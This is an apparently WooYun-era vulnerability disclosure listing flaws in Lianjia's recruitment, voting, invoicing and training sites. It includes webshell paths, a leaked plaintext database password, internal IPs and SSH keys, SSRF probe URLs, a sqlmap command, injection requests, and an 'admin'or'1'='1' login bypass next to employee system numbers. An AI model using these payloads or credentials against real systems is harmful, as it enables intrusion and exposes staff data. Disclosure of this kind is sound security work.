链家房地产公司漏洞合集(命令执行/SSRF/SQL注入/逻辑漏洞等)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153103

漏洞标题：链家房地产公司漏洞合集(命令执行/SSRF/SQL注入/逻辑漏洞等)

漏洞作者： _Thorns

提交时间：2015-11-09 18:24

修复时间：2015-12-24 18:56

公开时间：2015-12-24 18:56

漏洞类型：命令执行

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-09：细节已通知厂商并且等待厂商处理中
2015-11-09：厂商已经确认，细节仅向厂商公开
2015-11-19：细节向核心白帽子及相关领域专家公开
2015-11-29：细节向普通白帽子公开
2015-12-09：细节向实习白帽子公开
2015-12-24：细节向公众公开

简要描述：

链家房地产公司漏洞合集(二)

详细说明：

1、链家招聘系统命令执行漏洞
http://www.homelinkhr.com/view_initIndexPageForCustomer.action
http://www.homelinkhr.com/one8.jsp
http://www.homelinkhr.com/cmd.jsp

<property name="hibernate.connection.url">jdbc:mysql://127.0.0.1/homelink?useUnicode=true&amp;characterEncoding=utf8</property>
		<property name="hibernate.connection.driver_class">com.mysql.jdbc.Driver</property>
		<property name="hibernate.connection.username">root</property>
		<property name="hibernate.connection.password">homelink</property>

backuser@172.16.3.111::hrzhaopinDB
172.16.3.55 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDenANUQXTI9NHoWt5MTz6W2mflfX9v9jaKp5Bf36gLtCxDXTw48JDiYOGyXEKqrFsm6sdMyOZJnZTV51s5wSMiCJ+mD/aGAMOelptTyrhgM8CKGcMC7joUnt+Ytgh8qaiTOVL25SodIJTcte67m2AzrobmijEjQeG4v/y54c8AY9JSYpMxl78+dm1rUBXDAXrIq+O1Xa1huH1Fzrff32O3BN447U+CnSoNcP/+zltU5Ipx1djiBr76dyaG98hlxhqByDrvOJgtwrbtKDRc9HS3eHwH/cvgbKpRHLRUZiapX+z6IOnH89MGnVSAQKl3ZgNrhzvQlSVC769cy7sm/xU7
10.20.6.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwnjauhVy/wnS7lMbk8KAnSkQxm1x+7LrdfSUFGvcn6b6jwfp0OX89lQFGZ9GjJiU7gQ/Y6gcEKyYzx5n7xburk63b/er8D8Re7Y9p9HV+MYGAC0Gv8gY0zbcyDLFRlsJLWxgIhRvtY716cyrtO5oGDv4YpKhRPNKTUntrzcY899HhVe8QY2sBIbhyq4iygzk57C73gMj+/WZ2Xxz9soxfZE2a7wIBkSZ40KRxNTfnLGi4ysixXHYm7tSxUlhWPVvlLNWZX7EPOxLePvSyeyu0fGk5Egva/qTE+Ikvqt3njiRdN6MUcyr+7ymWDtJnfb6hL06B+rwvSEZSBVixhoJ5w==
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdVKLF5zuSvw95yYgrn9ry0C1iDVrAJnmYFO9azkWQdRNwJS/XBn4HJBFDru2WMDQAxbwKPhBfrb+mTv6yPylhPqv3nAZmsdnqrwsAG1SQmDdiJi9jcX8fqfBzmrF/Rtf/T8dYDG6DyP8txn4eqKhkIHUG07cZGJJTO536SzEH4KE6hpWolW78l1s3QnkZsXWH8JDssXcYGjAnYOLyN3hevmXNsKWJk4NIRCUL6jxo+Ybwr10kzozC0k7RvkNbEwFLGIvwY0chRAqVr6BsH0iiIrVIZGlJNfM46gX2W4b6RTAXFS4WV5ZzMqo7BHRFDUXRx51+sQrSt1/X0ObmTXCR wangam_v@homelink.com.cn

被挂了一堆这种东西

http://www.homelinkhr.com/nei.jsp?http://10.20.6.4:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.5:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.6:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.11:80

就简单的看了下，其他网段没注意，修复了就好。

——————————————————————————————————————————
2、链家招聘平台SQL注入漏洞
Sqlmap -u "http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080302"

[19:14:24] [INFO] retrieved: "root","*****19DAAC4D4D97FB5C51731117291FE0A4D139"
[19:14:25] [INFO] retrieved: "zabbix","*****4D7D88CD046ECA02A80393B7780A63E7E...
[19:14:25] [INFO] retrieved: "hruser","*****19DAAC4D4D97FB5C51731117291FE0A4D139
密码我打码了。
——————————————————————————————————————
3、链家某投票网站注入漏洞+弱口令
http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
弱口令 admin

GET /admin.php?type=modify&id=5 HTTP/1.1
Host: homelinktc.sinaapp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
Cookie: saeut=171.217.194.217.1446810857432391; PHPSESSID=e9a956ed0ad36a4e78bef22de3791749
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive

——————————————————————————————————————
4、开票吧逻辑漏洞
http://kaipiaoba.homelink.com.cn/ri/system/logout.action
找回密码，网页自动返回了验证码。

——————————————————————————————————
5、培训系统注入漏洞，百密一疏。

>>  有了系统号，就直接可以进系统了。
20003441 
10077125
10094796
20078458
20077533
20077532
20078346
20079701
10099533
20074589
20028476
密码：admin'or'1'='1

注入

GET /Superagent/Reports02.aspx?UniqNo=370 HTTP/1.1
Host: tc.homelink.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=neea03pfbrjwag2sgmjuakgw
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive

http://tc.homelink.com.cn/Shopmall/PurchaseItems01.aspx

权限SA，路径也有了，写个shell应该不难，参照：
WooYun: 链家某站由一个弱口令导致一次简单内网漫游（修复不彻底）
WooYun: 链家某系统SQL注入未修复彻底导致再次Getshell

Database: TrainingCenter
[310 tables]
+--------------------------------------------------+
| dbo.AcademyCertificateCourse                     |
| dbo.AcademyCertificateCourseProfile              |
| dbo.AcademyCertificateCourseQual                 |
| dbo.AcademyCertificateCourseReg                  |
| dbo.AcademyClass                                 |
| dbo.AcademyClassCourse                           |
| dbo.AcademyClassRoom                             |
| dbo.AcademyClassRoomUsage                        |
| dbo.AcademyCourse                                |
| dbo.AcademyCourseGroupDetail                     |
| dbo.AcademyCourseGroupHeader                     |
| dbo.AcademyCourseProfile                         |
| dbo.AcademyCourseQual                            |
| dbo.AcademyCourseVideo                           |
| dbo.AcademyDormitory                             |
| dbo.AcademyDormitoryUsage                        |
| dbo.AcademyEchelon                               |
| dbo.AcademyEchelonCourse                         |
| dbo.AcademyMatrix                                |
| dbo.AcademyMatrixZone                            |
| dbo.AcademyStudent                               |
| dbo.AcademyStudentCourseMark                     |
| dbo.AcademyStudentSatisfaction                   |
| dbo.AcademyStudentSatisfactionS                  |
| dbo.AcademySupervisor                            |
| dbo.AcademyTeacher                               |
| dbo.AcademyTeacherLog                            |
| dbo.Branch                                       |
| dbo.City                                         |
| dbo.Comments                                     |
| dbo.Division                                     |
| dbo.EmpCertificateCourseMark                     |
| dbo.ErrorData                                    |
| dbo.EruditeAuditor                               |
| dbo.EruditeDateInfo                              |
| dbo.EruditeExamRoom                              |
| dbo.EruditeInvigilator                           |
| dbo.GeneralParms02                               |
| dbo.Invoice                                      |
| dbo.InvoiceMembers                               |
| dbo.News                                         |
| dbo.NewsLike                                     |
| dbo.NewsPhoto                                    |
| dbo.Orders                                       |
| dbo.ProductCourse                                |
| dbo.ProductPrice                                 |
| dbo.Products                                     |
| dbo.ProgramLog                                   |
| dbo.ReaderCourse                                 |
| dbo.SABranch                                     |
| dbo.SecPrograms                                  |
| dbo.SecRoleProgPrivilege                         |
| dbo.SecRoles                                     |
| dbo.SecSubSystems                                |
| dbo.SecSystems                                   |
| dbo.SecUserProgPrivilege                         |
| dbo.SecUserRole                                  |
| dbo.SecUsers                                     |
| dbo.SuperAgent                                   |
| dbo.SuperAgentCandidate                          |
| dbo.SuperAgentScore                              |
| dbo.SystemParms02                                |
| dbo.SystemValues                                 |
| dbo.TC_Agent                                     |
| dbo.TC_AgentCategory                             |
| dbo.TC_AgentStatus                               |
| dbo.TC_Area                                      |
| dbo.TC_AreaQuizMark                              |
| dbo.TC_Branch                                    |
| dbo.TC_City                                      |
| dbo.TC_Division                                  |
| dbo.TC_EmpQuizMark                               |
| dbo.TC_Employee                                  |
| dbo.TC_EmployeeIDTemp                            |
| dbo.TC_EmployeeObj                               |
| dbo.TC_EmployeeTemp                              |
| dbo.TC_QuizStatus                                |
| dbo.TC_Teacher                                   |
| dbo.TC_Team                                      |
| dbo.TC_Zone                                      |
| dbo.TMPDataCheckLog                              |
| dbo.UP_Agent                                     |
| dbo.ViewAcademyCertificateCourse01               |
| dbo.ViewAcademyCertificateCourse02               |
| dbo.ViewAcademyCertificateCourseProfile01        |
| dbo.ViewAcademyCertificateCourseQual01           |
| dbo.ViewAcademyCertificateCourseReg01            |
| dbo.ViewAcademyCertificateCourseReg02            |
| dbo.ViewAcademyClass01                           |
| dbo.ViewAcademyClassCourse01                     |
| dbo.ViewAcademyClassCourseStudentMark01          |
| dbo.ViewAcademyClassCourseStudentMark02          |
| dbo.ViewAcademyClassRoom01                       |
| dbo.ViewAcademyClassRoomNoOfStudent01            |
| dbo.ViewAcademyClassRoomNoOfStudent02            |
| dbo.ViewAcademyClassRoomUsage01                  |
| dbo.ViewAcademyCourse01                          |
| dbo.ViewAcademyCourseGroupDetail01               |
| dbo.ViewAcademyCourseProfile01                   |
| dbo.ViewAcademyCourseQual01                      |
| dbo.ViewAcademyCourseVideo01                     |
| dbo.ViewAcademyDormitory01                       |
| dbo.ViewAcademyDormitoryNoOfStudent01            |
| dbo.ViewAcademyDormitoryUsage01                  |
| dbo.ViewAcademyEchelon01                         |
| dbo.ViewAcademyEchelonClass01                    |
| dbo.ViewAcademyEchelonCourse01                   |
| dbo.ViewAcademyEchelonCourseByCategory01         |
| dbo.ViewAcademyEchelonNoOfStudent01              |
| dbo.ViewAcademyEchelonTerms01                    |
| dbo.ViewAcademyMatrixZone01                      |
| dbo.ViewAcademyStudent01                         |
| dbo.ViewAcademyStudentByAreas00                  |
| dbo.ViewAcademyStudentByAreas01                  |
| dbo.ViewAcademyStudentByAreas02                  |
| dbo.ViewAcademyStudentByAreas03                  |
| dbo.ViewAcademyStudentByAreas04                  |
| dbo.ViewAcademyStudentByAreas05                  |
| dbo.ViewAcademyStudentByAreas06                  |
| dbo.ViewAcademyStudentByBranchs00                |
| dbo.ViewAcademyStudentByBranchs01                |
| dbo.ViewAcademyStudentByBranchs02                |
| dbo.ViewAcademyStudentByBranchs03                |
| dbo.ViewAcademyStudentByBranchs04                |
| dbo.ViewAcademyStudentByBranchs05                |
| dbo.ViewAcademyStudentByBranchs06                |
| dbo.ViewAcademyStudentByTeams00                  |
| dbo.ViewAcademyStudentByTeams01                  |
| dbo.ViewAcademyStudentByTeams02                  |
| dbo.ViewAcademyStudentByTeams03                  |
| dbo.ViewAcademyStudentByTeams04                  |
| dbo.ViewAcademyStudentByTeams05                  |
| dbo.ViewAcademyStudentByTeams06                  |
| dbo.ViewAcademyStudentByZones00                  |
| dbo.ViewAcademyStudentByZones01                  |
| dbo.ViewAcademyStudentByZones02                  |
| dbo.ViewAcademyStudentByZones03                  |
| dbo.ViewAcademyStudentByZones04                  |
| dbo.ViewAcademyStudentByZones05                  |
| dbo.ViewAcademyStudentByZones06                  |
| dbo.ViewAcademyStudentCourseMark01               |
| dbo.ViewAcademyStudentCourseMark02               |
| dbo.ViewAcademyStudentCourseMark03               |
| dbo.ViewAcademyStudentCourseMark04               |
| dbo.ViewAcademyStudentCourseMark11               |
| dbo.ViewAcademyStudentCourseMark12               |
| dbo.ViewAcademyStudentCourseMark13               |
| dbo.ViewAcademyStudentGroupByEmpCategory01       |
| dbo.ViewAcademyStudentGroupByEmpCategoryGender01 |
| dbo.ViewAcademyStudentGroupByGender01            |
| dbo.ViewAcademyStudentGroupByZone01              |
| dbo.ViewAcademyStudentNoOfClassRoom01            |
| dbo.ViewAcademyStudentNoOfClassRoom02            |
| dbo.ViewAcademyStudentNoOfClassRoom03            |
| dbo.ViewAcademyStudentNoOfClassRoom04            |
| dbo.ViewAcademyStudentNoOfDormitory01            |
| dbo.ViewAcademyStudentNoOfEMPTMStatus01          |
| dbo.ViewAcademyStudentNoOfMatrix01               |
| dbo.ViewAcademyStudentSatisfaction01             |
| dbo.ViewAcademyStudentSatisfaction02             |
| dbo.ViewAcademyStudentSatisfactionAVG01          |
| dbo.ViewAcademyStudentSatisfactionQ00            |
| dbo.ViewAcademyStudentSatisfactionQ01            |
| dbo.ViewAcademyStudentSatisfactionQ02            |
| dbo.ViewAcademyStudentSatisfactionQ03            |
| dbo.ViewAcademyStudentSatisfactionQ04            |
| dbo.ViewAcademyStudentSatisfactionQ05            |
| dbo.ViewAcademyStudentSatisfactionQ06            |
| dbo.ViewAcademyStudentSatisfactionQ07            |
| dbo.ViewAcademyStudentSatisfactionQ08            |
| dbo.ViewAcademyStudentSatisfactionQ09            |
| dbo.ViewAcademyStudentSatisfactionQ10            |
| dbo.ViewAcademyStudentSatisfactionQ11            |
| dbo.ViewAcademyStudentSatisfactionQ12            |
| dbo.ViewAcademyStudentSatisfactionQ13            |
| dbo.ViewAcademyStudentSatisfactionQ14            |
| dbo.ViewAcademyStudentSatisfactionQ15            |
| dbo.ViewAcademyStudentSatisfactionQ16            |
| dbo.ViewAcademyStudentSatisfactionQ17            |
| dbo.ViewAcademyStudentSatisfactionQ18            |
| dbo.ViewAcademyStudentSatisfactionQ19            |
| dbo.ViewAcademyStudentSatisfactionQ20            |
| dbo.ViewAcademyTeacher01                         |
| dbo.ViewAcademyTeacherPoint01                    |
| dbo.ViewBranch01                                 |
| dbo.ViewComments01                               |
| dbo.ViewComments02                               |
| dbo.ViewDivision01                               |
| dbo.ViewEmpCertificateCourseMark01               |
| dbo.ViewEruditeAuditor01                         |
| dbo.ViewEruditeDateDistinct01                    |
| dbo.ViewEruditeDateInfo01                        |
| dbo.ViewEruditeExamRoom01                        |
| dbo.ViewEruditeExamRoomAuditor01                 |
| dbo.ViewEruditeExamRoomEmpEnroll                 |
| dbo.ViewEruditeInvigilator01                     |
| dbo.ViewEruditeMark01                            |
| dbo.ViewInvoice01                                |
| dbo.ViewInvoiceMembers01                         |
| dbo.ViewNews01                                   |
| dbo.ViewNewsLike01                               |
| dbo.ViewProductCourse01                          |
| dbo.ViewProducts01                               |
| dbo.ViewReaderCourse01                           |
| dbo.ViewSABranch01                               |
| dbo.ViewSABranch02                               |
| dbo.ViewSecPrograms01                            |
| dbo.ViewSecRoleProgPrivilege01                   |
| dbo.ViewSecRoleProgPrivilege02                   |
| dbo.ViewSecSubSystems01                          |
| dbo.ViewSecSystems01                             |
| dbo.ViewSecUserProgPrivilege01                   |
| dbo.ViewSecUserProgPrivilegeByDistSystemCode     |
| dbo.ViewSecUserRole01                            |
| dbo.ViewSecUsers01                               |
| dbo.ViewSuperAgent01                             |
| dbo.ViewSuperAgentCandidate01                    |
| dbo.ViewSuperAgentScore01                        |
| dbo.ViewTCAgent01                                |
| dbo.ViewTCAgentByAreaAgentTotal01                |
| dbo.ViewTCAgentByBranchAgentTotal01              |
| dbo.ViewTCAgentByCityAgentTotal01                |
| dbo.ViewTCAgentByDivisionAgentTotal01            |
| dbo.ViewTCAgentByTeamAgentTotal01                |
| dbo.ViewTCAgentByZoneAgentTotal01                |
| dbo.ViewTCArea01                                 |
| dbo.ViewTCBranch01                               |
| dbo.ViewTCCity01                                 |
| dbo.ViewTCDivision01                             |
| dbo.ViewTCEmpQuizMark01                          |
| dbo.ViewTCEmpQuizMarkByAreaAbsentTotal01         |
| dbo.ViewTCEmpQuizMarkByAreaAgentTotal01          |
| dbo.ViewTCEmpQuizMarkByAreaQuiz01                |
| dbo.ViewTCEmpQuizMarkByAreaQuizTotal01           |
| dbo.ViewTCEmpQuizMarkByAreaRecordTotal01         |
| dbo.ViewTCEmpQuizMarkByAreaUnQuizTotal01         |
| dbo.ViewTCEmpQuizMarkByBranchAbsentTotal01       |
| dbo.ViewTCEmpQuizMarkByBranchAgentTotal01        |
| dbo.ViewTCEmpQuizMarkByBranchQuiz01              |
| dbo.ViewTCEmpQuizMarkByBranchQuizTotal01         |
| dbo.ViewTCEmpQuizMarkByBranchRecordTotal01       |
| dbo.ViewTCEmpQuizMarkByBranchUnQuizTotal01       |
| dbo.ViewTCEmpQuizMarkByCityAbsentTotal01         |
| dbo.ViewTCEmpQuizMarkByCityAgentTotal01          |
| dbo.ViewTCEmpQuizMarkByCityQuiz01                |
| dbo.ViewTCEmpQuizMarkByCityQuizTotal01           |
| dbo.ViewTCEmpQuizMarkByCityRecordTotal01         |
| dbo.ViewTCEmpQuizMarkByCityUnQuizTotal01         |
| dbo.ViewTCEmpQuizMarkByDivisionAbsentTotal01     |
| dbo.ViewTCEmpQuizMarkByDivisionAgentTotal01      |
| dbo.ViewTCEmpQuizMarkByDivisionQuiz01            |
| dbo.ViewTCEmpQuizMarkByDivisionQuizTotal01       |
| dbo.ViewTCEmpQuizMarkByDivisionRecordTotal01     |
| dbo.ViewTCEmpQuizMarkByDivisionUnQuizTotal01     |
| dbo.ViewTCEmpQuizMarkByTeamAbsentTotal01         |
| dbo.ViewTCEmpQuizMarkByTeamAgentTotal01          |
| dbo.ViewTCEmpQuizMarkByTeamQuiz01                |
| dbo.ViewTCEmpQuizMarkByTeamQuizTotal01           |
| dbo.ViewTCEmpQuizMarkByTeamRecordTotal01         |
| dbo.ViewTCEmpQuizMarkByTeamUnQuizTotal01         |
| dbo.ViewTCEmpQuizMarkByZoneAbsentTotal01         |
| dbo.ViewTCEmpQuizMarkByZoneAgentTotal01          |
| dbo.ViewTCEmpQuizMarkByZoneQuiz01                |
| dbo.ViewTCEmpQuizMarkByZoneQuizTotal01           |
| dbo.ViewTCEmpQuizMarkByZoneRecordTotal01         |
| dbo.ViewTCEmpQuizMarkByZoneUnQuizTotal01         |
| dbo.ViewTCEmployee01                             |
| dbo.ViewTCEmployeeTempNoOfRecords01              |
| dbo.ViewTCQuizDateDistinct01                     |
| dbo.ViewTCTeam01                                 |
| dbo.ViewTCZone01                                 |
| dbo.ViewTeacherPrestudyLog01                     |
| dbo.ViewZTCenterArea01                           |
| dbo.ViewZTCenterRoom01                           |
| dbo.ViewZTClass01                                |
| dbo.ViewZTClass02                                |
| dbo.ViewZTClassRoom01                            |
| dbo.ViewZTStudent01                              |
| dbo.ViewZTStudent01SumByArea                     |
| dbo.ViewZTStudent01SumByAreaAbsent               |
| dbo.ViewZTStudent01SumByAreaAttend               |
| dbo.ViewZTStudent01SumByAreaLate                 |
| dbo.ViewZTStudent01SumByAreaLeave                |
| dbo.ViewZTStudent01SumByAreaMark100              |
| dbo.ViewZTStudent01SumByAreaPass                 |
| dbo.ViewZTStudent01SumByAreaTotal                |
| dbo.ViewZTStudent01SumByClassAbsent              |
| dbo.ViewZTStudent01SumByClassAttend              |
| dbo.ViewZTStudent01SumByClassLate                |
| dbo.ViewZTStudent01SumByClassLeave               |
| dbo.ViewZTStudent01SumByClassMark100             |
| dbo.ViewZTStudent01SumByClassPass                |
| dbo.ViewZTStudent01SumByClassTotal               |
| dbo.ViewZTStudentCourse01                        |
| dbo.ViewZTStudentCourseMark01                    |
| dbo.ViewZTStudentCourseMark02                    |
| dbo.ViewZTStudentCourseMark03                    |
| dbo.ViewZone01                                   |
| dbo.ZTCenter                                     |
| dbo.ZTCenterArea                                 |
| dbo.ZTCenterRoom                                 |
| dbo.ZTClass                                      |
| dbo.ZTClassRoom                                  |
| dbo.ZTStudent                                    |
| dbo.ZTStudentCourse                              |
| dbo.ZTStudentCourseMark                          |
| dbo.ZTStudentCourseMarkTemp                      |
| dbo.Zone                                         |

漏洞证明：

1、链家招聘系统命令执行漏洞
http://www.homelinkhr.com/view_initIndexPageForCustomer.action
http://www.homelinkhr.com/one8.jsp
http://www.homelinkhr.com/cmd.jsp

<property name="hibernate.connection.url">jdbc:mysql://127.0.0.1/homelink?useUnicode=true&amp;characterEncoding=utf8</property>
		<property name="hibernate.connection.driver_class">com.mysql.jdbc.Driver</property>
		<property name="hibernate.connection.username">root</property>
		<property name="hibernate.connection.password">homelink</property>

backuser@172.16.3.111::hrzhaopinDB
172.16.3.55 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDenANUQXTI9NHoWt5MTz6W2mflfX9v9jaKp5Bf36gLtCxDXTw48JDiYOGyXEKqrFsm6sdMyOZJnZTV51s5wSMiCJ+mD/aGAMOelptTyrhgM8CKGcMC7joUnt+Ytgh8qaiTOVL25SodIJTcte67m2AzrobmijEjQeG4v/y54c8AY9JSYpMxl78+dm1rUBXDAXrIq+O1Xa1huH1Fzrff32O3BN447U+CnSoNcP/+zltU5Ipx1djiBr76dyaG98hlxhqByDrvOJgtwrbtKDRc9HS3eHwH/cvgbKpRHLRUZiapX+z6IOnH89MGnVSAQKl3ZgNrhzvQlSVC769cy7sm/xU7
10.20.6.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwnjauhVy/wnS7lMbk8KAnSkQxm1x+7LrdfSUFGvcn6b6jwfp0OX89lQFGZ9GjJiU7gQ/Y6gcEKyYzx5n7xburk63b/er8D8Re7Y9p9HV+MYGAC0Gv8gY0zbcyDLFRlsJLWxgIhRvtY716cyrtO5oGDv4YpKhRPNKTUntrzcY899HhVe8QY2sBIbhyq4iygzk57C73gMj+/WZ2Xxz9soxfZE2a7wIBkSZ40KRxNTfnLGi4ysixXHYm7tSxUlhWPVvlLNWZX7EPOxLePvSyeyu0fGk5Egva/qTE+Ikvqt3njiRdN6MUcyr+7ymWDtJnfb6hL06B+rwvSEZSBVixhoJ5w==
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdVKLF5zuSvw95yYgrn9ry0C1iDVrAJnmYFO9azkWQdRNwJS/XBn4HJBFDru2WMDQAxbwKPhBfrb+mTv6yPylhPqv3nAZmsdnqrwsAG1SQmDdiJi9jcX8fqfBzmrF/Rtf/T8dYDG6DyP8txn4eqKhkIHUG07cZGJJTO536SzEH4KE6hpWolW78l1s3QnkZsXWH8JDssXcYGjAnYOLyN3hevmXNsKWJk4NIRCUL6jxo+Ybwr10kzozC0k7RvkNbEwFLGIvwY0chRAqVr6BsH0iiIrVIZGlJNfM46gX2W4b6RTAXFS4WV5ZzMqo7BHRFDUXRx51+sQrSt1/X0ObmTXCR wangam_v@homelink.com.cn

被挂了一堆这种东西

http://www.homelinkhr.com/nei.jsp?http://10.20.6.4:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.5:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.6:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.11:80

就简单的看了下，其他网段没注意，修复了就好。

GET /admin.php?type=modify&id=5 HTTP/1.1
Host: homelinktc.sinaapp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
Cookie: saeut=171.217.194.217.1446810857432391; PHPSESSID=e9a956ed0ad36a4e78bef22de3791749
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive

——————————————————————————————————
5、培训系统注入漏洞，百密一疏。

>>  有了系统号，就直接可以进系统了。
20003441 
10077125
10094796
20078458
20077533
20077532
20078346
20079701
10099533
20074589
20028476
密码：admin'or'1'='1

注入

GET /Superagent/Reports02.aspx?UniqNo=370 HTTP/1.1
Host: tc.homelink.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=neea03pfbrjwag2sgmjuakgw
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive

http://tc.homelink.com.cn/Shopmall/PurchaseItems01.aspx

Database: TrainingCenter
[310 tables]
+--------------------------------------------------+
| dbo.AcademyCertificateCourse                     |
| dbo.AcademyCertificateCourseProfile              |
| dbo.AcademyCertificateCourseQual                 |
| dbo.AcademyCertificateCourseReg                  |
| dbo.AcademyClass                                 |
| dbo.AcademyClassCourse                           |
| dbo.AcademyClassRoom                             |
| dbo.AcademyClassRoomUsage                        |
| dbo.AcademyCourse                                |
| dbo.AcademyCourseGroupDetail                     |
| dbo.AcademyCourseGroupHeader                     |
| dbo.AcademyCourseProfile                         |
| dbo.AcademyCourseQual                            |
| dbo.AcademyCourseVideo                           |
| dbo.AcademyDormitory                             |
| dbo.AcademyDormitoryUsage                        |
| dbo.AcademyEchelon                               |
| dbo.AcademyEchelonCourse                         |
| dbo.AcademyMatrix                                |
| dbo.AcademyMatrixZone                            |
| dbo.AcademyStudent                               |
| dbo.AcademyStudentCourseMark                     |
| dbo.AcademyStudentSatisfaction                   |
| dbo.AcademyStudentSatisfactionS                  |
| dbo.AcademySupervisor                            |
| dbo.AcademyTeacher                               |
| dbo.AcademyTeacherLog                            |
| dbo.Branch                                       |
| dbo.City                                         |
| dbo.Comments                                     |
| dbo.Division                                     |
| dbo.EmpCertificateCourseMark                     |
| dbo.ErrorData                                    |
| dbo.EruditeAuditor                               |
| dbo.EruditeDateInfo                              |
| dbo.EruditeExamRoom                              |
| dbo.EruditeInvigilator                           |
| dbo.GeneralParms02                               |
| dbo.Invoice                                      |
| dbo.InvoiceMembers                               |
| dbo.News                                         |
| dbo.NewsLike                                     |
| dbo.NewsPhoto                                    |
| dbo.Orders                                       |
| dbo.ProductCourse                                |
| dbo.ProductPrice                                 |
| dbo.Products                                     |
| dbo.ProgramLog                                   |
| dbo.ReaderCourse                                 |
| dbo.SABranch                                     |
| dbo.SecPrograms                                  |
| dbo.SecRoleProgPrivilege                         |
| dbo.SecRoles                                     |
| dbo.SecSubSystems                                |
| dbo.SecSystems                                   |
| dbo.SecUserProgPrivilege                         |
| dbo.SecUserRole                                  |
| dbo.SecUsers                                     |
| dbo.SuperAgent                                   |
| dbo.SuperAgentCandidate                          |
| dbo.SuperAgentScore                              |
| dbo.SystemParms02                                |
| dbo.SystemValues                                 |
| dbo.TC_Agent                                     |
| dbo.TC_AgentCategory                             |
| dbo.TC_AgentStatus                               |
| dbo.TC_Area                                      |
| dbo.TC_AreaQuizMark                              |
| dbo.TC_Branch                                    |
| dbo.TC_City                                      |
| dbo.TC_Division                                  |
| dbo.TC_EmpQuizMark                               |
| dbo.TC_Employee                                  |
| dbo.TC_EmployeeIDTemp                            |
| dbo.TC_EmployeeObj                               |
| dbo.TC_EmployeeTemp                              |
| dbo.TC_QuizStatus                                |
| dbo.TC_Teacher                                   |
| dbo.TC_Team                                      |
| dbo.TC_Zone                                      |
| dbo.TMPDataCheckLog                              |
| dbo.UP_Agent                                     |
| dbo.ViewAcademyCertificateCourse01               |
| dbo.ViewAcademyCertificateCourse02               |
| dbo.ViewAcademyCertificateCourseProfile01        |
| dbo.ViewAcademyCertificateCourseQual01           |
| dbo.ViewAcademyCertificateCourseReg01            |
| dbo.ViewAcademyCertificateCourseReg02            |
| dbo.ViewAcademyClass01                           |
| dbo.ViewAcademyClassCourse01                     |
| dbo.ViewAcademyClassCourseStudentMark01          |
| dbo.ViewAcademyClassCourseStudentMark02          |
| dbo.ViewAcademyClassRoom01                       |
| dbo.ViewAcademyClassRoomNoOfStudent01            |
| dbo.ViewAcademyClassRoomNoOfStudent02            |
| dbo.ViewAcademyClassRoomUsage01                  |
| dbo.ViewAcademyCourse01                          |
| dbo.ViewAcademyCourseGroupDetail01               |
| dbo.ViewAcademyCourseProfile01                   |
| dbo.ViewAcademyCourseQual01                      |
| dbo.ViewAcademyCourseVideo01                     |
| dbo.ViewAcademyDormitory01                       |
| dbo.ViewAcademyDormitoryNoOfStudent01            |
| dbo.ViewAcademyDormitoryUsage01                  |
| dbo.ViewAcademyEchelon01                         |
| dbo.ViewAcademyEchelonClass01                    |
| dbo.ViewAcademyEchelonCourse01                   |
| dbo.ViewAcademyEchelonCourseByCategory01         |
| dbo.ViewAcademyEchelonNoOfStudent01              |
| dbo.ViewAcademyEchelonTerms01                    |
| dbo.ViewAcademyMatrixZone01                      |
| dbo.ViewAcademyStudent01                         |
| dbo.ViewAcademyStudentByAreas00                  |
| dbo.ViewAcademyStudentByAreas01                  |
| dbo.ViewAcademyStudentByAreas02                  |
| dbo.ViewAcademyStudentByAreas03                  |
| dbo.ViewAcademyStudentByAreas04                  |
| dbo.ViewAcademyStudentByAreas05                  |
| dbo.ViewAcademyStudentByAreas06                  |
| dbo.ViewAcademyStudentByBranchs00                |
| dbo.ViewAcademyStudentByBranchs01                |
| dbo.ViewAcademyStudentByBranchs02                |
| dbo.ViewAcademyStudentByBranchs03                |
| dbo.ViewAcademyStudentByBranchs04                |
| dbo.ViewAcademyStudentByBranchs05                |
